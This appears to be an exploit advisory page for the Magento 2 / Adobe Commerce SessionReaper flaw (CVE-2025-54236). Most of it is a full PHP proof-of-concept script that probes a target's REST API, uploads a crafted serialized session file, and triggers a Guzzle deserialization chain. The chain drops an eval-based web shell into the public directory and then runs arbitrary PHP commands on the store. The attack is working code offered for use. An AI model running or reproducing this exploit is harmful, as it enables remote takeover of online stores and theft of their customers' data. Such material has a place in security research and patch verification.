Magento 2 / Adobe Commerce 2.4.x SessionReaper
=============================================================================================================================================
| # Title Magento 2 / Adobe Commerce 2.4.x SessionReaper
=============================================================================================================================================
| # Title : Magento 2 / Adobe Commerce 2.4.x SessionReaper Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://community.magento.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212729/ & CVE-2025-54236
[+] Summary : This PHP script is a proof?of?concept exploit targeting Magento for CVE?2025?54236, commonly referred to as SessionReaper.
It is a PHP port of an original Metasploit module and is designed for security testing.
[+] What it does (high level):
Generates random identifiers (session ID, filenames, parameters) to avoid collisions.
Checks whether a Magento target appears vulnerable by sending crafted REST API requests and analyzing HTTP responses (400/404/500 patterns).
If vulnerable, abuses PHP object deserialization via Magento?s REST endpoint to manipulate the session save path.
Uploads a malicious session file using a file upload endpoint.
Triggers deserialization to write a PHP file into a web?accessible location.
Executes a supplied PHP payload by POSTing base64?encoded data to the dropped file.
Uses cURL for all HTTP interactions and handles multipart/form?data manually.
[+] Key components:
check() ? determines vulnerability based on response behavior.
exploit() ? performs the full exploit chain and executes a payload.
Guzzle/FW1 object serialization ? used to craft the malicious session content.
Randomization helpers ? generate IDs, filenames, and parameters.
CLI usage ? allows running the script from the command line with a target URL and optional payload.
[+] PoC :
# For testing only
php magento_exploit.php https://target.com/
# For execution with a custom payload
php magento_exploit.php https://target.com/ 'echo "Vulnerable!";'
<?php
class MagentoSessionReaperExploit
{
private $targetUrl;
private $sessionId;
private $sessionFilename;
private $exploitFilename;
private $postParam;
private $formKey;
public function __construct($targetUrl)
{
$this->targetUrl = rtrim($targetUrl, '/');
$this->sessionId = $this->generateRandomHex(32);
$this->sessionFilename = "sess_{$this->sessionId}";
$this->exploitFilename = $this->generateRandomAlphanumeric(4, 8) . ".php";
$this->postParam = $this->generateRandomAlphanumeric(4, 8);
$this->formKey = $this->generateRandomAlphanumeric(8, 12);
}
public function check()
{
$randomPath = $this->generateRandomAlphanumeric(4, 8) . '/' .
$this->generateRandomAlphanumeric(4, 8) . '/' .
$this->generateRandomAlphanumeric(4, 8);
$cartId = $this->generateRandomAlphanumeric(4, 8);
$payload = $this->buildDeserializationPayload($randomPath);
$url = $this->targetUrl . "/rest/default/V1/guest-carts/{$cartId}/order";
$response = $this->sendRequest($url, 'PUT', $payload, [
'Content-Type: application/json',
'Accept: application/json'
]);
if (!$response) {
return ['status' => 'unknown', 'message' => 'No response from target'];
}
$httpCode = $response['http_code'];
$body = strtolower($response['body']);
switch ($httpCode) {
case 400:
return ['status' => 'safe', 'message' => 'Target is patched (returns 400 Bad Request)'];
case 404:
if ($this->check404Response($body)) {
return ['status' => 'vulnerable', 'message' => 'Target returned 404 with expected error pattern'];
}
break;
case 500:
if ($this->check500Response($body)) {
return ['status' => 'vulnerable', 'message' => 'Target returned 500 error with SessionHandler'];
}
break;
}
return ['status' => 'unknown', 'message' => "Unexpected HTTP status: {$httpCode}"];
}
public function exploit($phpPayload)
{
echo "[*] Generating Guzzle/FW1 deserialization payload...\n";
$phpStub = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$guzzlePayload = $this->buildGuzzleFw1Payload("pub/{$this->exploitFilename}", $phpStub);
echo "[*] Uploading session file with Guzzle payload...\n";
$uploadedPath = $this->uploadSessionFile($guzzlePayload);
if (!$uploadedPath) {
return ['success' => false, 'message' => 'Failed to upload session file'];
}
$savePath = "media/customer_address" . dirname($uploadedPath);
echo "[*] Triggering deserialization...\n";
if (!$this->triggerDeserialization($savePath)) {
return ['success' => false, 'message' => 'Failed to trigger deserialization'];
}
echo "[*] Executing payload...\n";
$encodedPayload = base64_encode($phpPayload);
$executeUrl = $this->targetUrl . "/pub/{$this->exploitFilename}";
$response = $this->sendRequest($executeUrl, 'POST',
http_build_query([$this->postParam => $encodedPayload]),
['Content-Type: application/x-www-form-urlencoded']
);
if ($response && $response['http_code'] == 200) {
echo "[+] Payload executed successfully!\n";
echo "[+] Response: " . substr($response['body'], 0, 500) . "...\n";
return [
'success' => true,
'message' => 'Exploit completed',
'session_id' => $this->sessionId,
'exploit_file' => $this->exploitFilename,
'post_param' => $this->postParam
];
}
return ['success' => false, 'message' => 'Payload execution failed'];
}
private function check404Response($body)
{
if (strpos($body, 'no such entity') === false) {
return false;
}
return (strpos($body, 'cartid') !== false) ||
(strpos($body, 'fieldname') !== false && strpos($body, 'fieldvalue') !== false);
}
private function check500Response($body)
{
if (strpos($body, '500 internal server error') !== false &&
strpos($body, 'sessionhandler') === false) {
return false;
}
return (strpos($body, 'sessionhandler::read') !== false) ||
(strpos($body, 'no such file or directory') !== false &&
strpos($body, 'session') !== false) ||
(strpos($body, 'webapi-') !== false);
}
private function sessionSaveDirFromFilename($filename)
{
return $filename[0] . '/' . $filename[1];
}
private function uploadSessionFile($content)
{
$filename = $this->sessionFilename;
echo "[*] Uploading malicious session file: {$filename}\n";
// Create multipart form data
$boundary = '----' . md5(microtime());
$eol = "\r\n";
$data = "--{$boundary}{$eol}";
$data .= "Content-Disposition: form-data; name=\"form_key\"{$eol}{$eol}";
$data .= "{$this->formKey}{$eol}";
$data .= "--{$boundary}{$eol}";
$data .= "Content-Disposition: form-data; name=\"custom_attributes[country_id]\"; filename=\"{$filename}\"{$eol}";
$data .= "Content-Type: application/octet-stream{$eol}{$eol}";
$data .= "{$content}{$eol}";
$data .= "--{$boundary}--{$eol}";
$url = $this->targetUrl . "/customer/address_file/upload";
$response = $this->sendRequest($url, 'POST', $data, [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Cookie: form_key={$this->formKey}"
]);
if (!$response || $response['http_code'] != 200) {
echo "[-] Upload failed with HTTP code: " . ($response['http_code'] ?? 'No response') . "\n";
return false;
}
// Parse JSON response
$json = json_decode($response['body'], true);
if (isset($json['error']) && $json['error'] != 0) {
echo "[-] Upload failed: {$json['error']}\n";
return false;
}
if (isset($json['file'])) {
return $json['file'];
}
// Default path
$saveDir = $this->sessionSaveDirFromFilename($filename);
return "/{$saveDir}/{$filename}";
}
private function buildDeserializationPayload($savePath)
{
$payload = [
'paymentMethod' => [
'paymentData' => [
'context' => [
'urlBuilder' => [
'session' => [
'sessionConfig' => [
'savePath' => $savePath
]
]
]
]
]
]
];
return json_encode($payload);
}
private function triggerDeserialization($savePath)
{
$cartId = $this->generateRandomAlphanumeric(4, 8);
$payload = $this->buildDeserializationPayload($savePath);
$url = $this->targetUrl . "/rest/default/V1/guest-carts/{$cartId}/order";
$response = $this->sendRequest($url, 'PUT', $payload, [
'Content-Type: application/json',
'Accept: application/json',
"Cookie: PHPSESSID={$this->sessionId}"
]);
if (!$response) {
return false;
}
return in_array($response['http_code'], [404, 500]);
}
private function serializeStringAscii($str)
{
$result = '';
$length = strlen($str);
for ($i = 0; $i < $length; $i++) {
$byte = ord($str[$i]);
// Keep printable ASCII except backslash and double quote
if ($byte >= 32 && $byte <= 126 && $byte != 92 && $byte != 34) {
$result .= $str[$i];
} else {
// Escape as \xHH
$result .= sprintf("\\x%02x", $byte);
}
}
return "S:{$length}:\"{$result}\";";
}
private function buildGuzzleFw1Payload($targetFile, $phpContent)
{
$escaped = "{$phpContent}\n";
$setCookieData = "a:3:{" .
$this->serializeStringAscii('Expires') . "i:1;" .
$this->serializeStringAscii('Discard') . "b:0;" .
$this->serializeStringAscii('Value') . $this->serializeStringAscii($escaped) .
"}";
$setCookie = 'O:27:"GuzzleHttp\\Cookie\\SetCookie":1:' .
"{" . $this->serializeStringAscii('data') . $setCookieData . "}";
$cookiesArray = "a:1:{i:0;{$setCookie}}";
$fileCookieJar = 'O:31:"GuzzleHttp\\Cookie\\FileCookieJar":4:' .
"{" . $this->serializeStringAscii('cookies') . $cookiesArray .
$this->serializeStringAscii('strictMode') . "N;" .
$this->serializeStringAscii('filename') . $this->serializeStringAscii($targetFile) .
$this->serializeStringAscii('storeSessionCookies') . "b:1;}";
return "_|{$fileCookieJar}";
}
private function sendRequest($url, $method, $data = null, $headers = [])
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
if ($data !== null) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}
if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}
$body = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);
if ($error && !$body) {
echo "[-] cURL error: {$error}\n";
return false;
}
return [
'http_code' => $httpCode,
'body' => $body,
'error' => $error
];
}
private function generateRandomHex($length)
{
$bytes = random_bytes($length / 2);
return bin2hex($bytes);
}
private function generateRandomAlphanumeric($min, $max)
{
$length = random_int($min, $max);
$chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$result = '';
for ($i = 0; $i < $length; $i++) {
$result .= $chars[random_int(0, strlen($chars) - 1)];
}
return $result;
}
}
if (php_sapi_name() === 'cli') {
if ($argc < 2) {
echo "Usage: php " . basename(__FILE__) . " <target_url> [payload]\n";
echo "Example: php " . basename(__FILE__) . " https://target.com/ 'system(\"id\");'\n";
exit(1);
}
$targetUrl = $argv[1];
$payload = $argv[2] ?? 'echo "Exploit successful!";';
$exploit = new MagentoSessionReaperExploit($targetUrl);
echo "[*] Checking target: {$targetUrl}\n";
$checkResult = $exploit->check();
echo "[*] Check result: {$checkResult['status']} - {$checkResult['message']}\n";
if ($checkResult['status'] === 'vulnerable') {
echo "[*] Target appears vulnerable. Proceeding with exploit...\n";
$result = $exploit->exploit($payload);
if ($result['success']) {
echo "[+] Exploit successful!\n";
echo "[+] Session ID: {$result['session_id']}\n";
echo "[+] Exploit file: {$result['exploit_file']}\n";
echo "[+] POST parameter: {$result['post_param']}\n";
} else {
echo "[-] Exploit failed: {$result['message']}\n";
}
} else {
echo "[-] Target does not appear vulnerable or check failed\n";
}
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Magento 2 / Adobe Commerce 2.4.x SessionReaper
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 128
